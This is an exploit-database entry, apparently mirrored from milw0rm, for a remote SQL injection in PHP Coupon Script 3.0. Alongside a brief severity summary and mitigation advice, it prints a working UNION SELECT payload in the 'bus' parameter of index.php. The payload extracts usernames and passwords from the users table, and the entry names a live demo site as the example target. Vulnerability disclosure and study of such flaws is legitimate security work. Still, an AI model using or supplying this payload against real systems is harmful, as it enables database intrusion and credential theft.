header-logo
Suggest Exploit
vendor:
PHP Coupon Script
by:
Unknown
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: PHP Coupon Script
Affected Version From: PHP Coupon Script 3.0
Affected Version To: PHP Coupon Script 3.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

PHP Coupon Script 3.0 Remote SQL Injection

The exploit allows an attacker to perform a remote SQL injection attack on the PHP Coupon Script 3.0. By manipulating the 'bus' parameter in the 'index.php?page=viewbus' page, the attacker can inject SQL code to retrieve sensitive information from the database, such as usernames and passwords.

Mitigation:

The vendor should release a patch or update to fix the SQL injection vulnerability. In the meantime, users of the PHP Coupon Script 3.0 should be cautious and consider implementing additional security measures to protect against SQL injection attacks.
Source

Exploit-DB raw data:

==============================================

PHP Coupon Script 3.0 Remote SQL Injection

==============================================

Found: Cyber-Security.org

==============================================

Script site: http://www.couponscript.com/

==============================================

Exploit:
index.php?page=viewbus&bus=-1/**/union/**/select/**/null,null,null,username,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/users/*

==============================================

Example: http://www.couponscript.com/demo/

==============================================

# milw0rm.com [2007-05-03]

Navigation

Suggest Exploit

Services By CQR